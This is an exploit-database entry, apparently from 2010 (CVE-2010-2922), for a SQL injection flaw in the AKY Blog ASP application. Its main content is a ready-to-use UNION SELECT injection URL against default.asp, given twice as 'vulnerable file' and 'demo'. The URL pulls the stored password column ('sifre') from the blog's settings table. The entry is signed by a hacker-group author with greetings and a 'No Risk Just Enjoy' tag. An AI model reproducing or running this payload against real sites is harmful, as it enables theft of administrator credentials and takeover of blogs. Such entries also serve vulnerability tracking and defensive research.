[] NeoSense

AKY Blog - SQL Injection

Author: v0calist
type: webapps
platform: asp
port: 
date_added: 2010-07-24 
date_updated: 2010-07-24 
verified: 1 
codes: CVE-2010-2922;OSVDB-66631 
tags: 
aliases:  
screenshot_url:  
application_url: 

===================================================
AKY Blog SQL İnjection
===================================================

Author : Madconfig
Homepage :  www.worldhackerz.com
Mail : admin[at]worldhackerz[dot].com
Script : http://www.aspindir.com/indir.asp?ID=5954&sIslem=Indir
Risk : No Risk Just Enjoy
Dork :  :/ sorry

===================================================

[+] Vulnerable File :

http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
sifre,2,3%20,4,5+from+aky_ayarlar

===================================================

[+] Demo :

http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar

===================================================

Greetz : Mezar,v0calist ,PaLa , By.ege, StreetCoder , AnqelHacker,M0sted

and all  www.worldhackerz.com Member

===================================================

# Turkish P0wer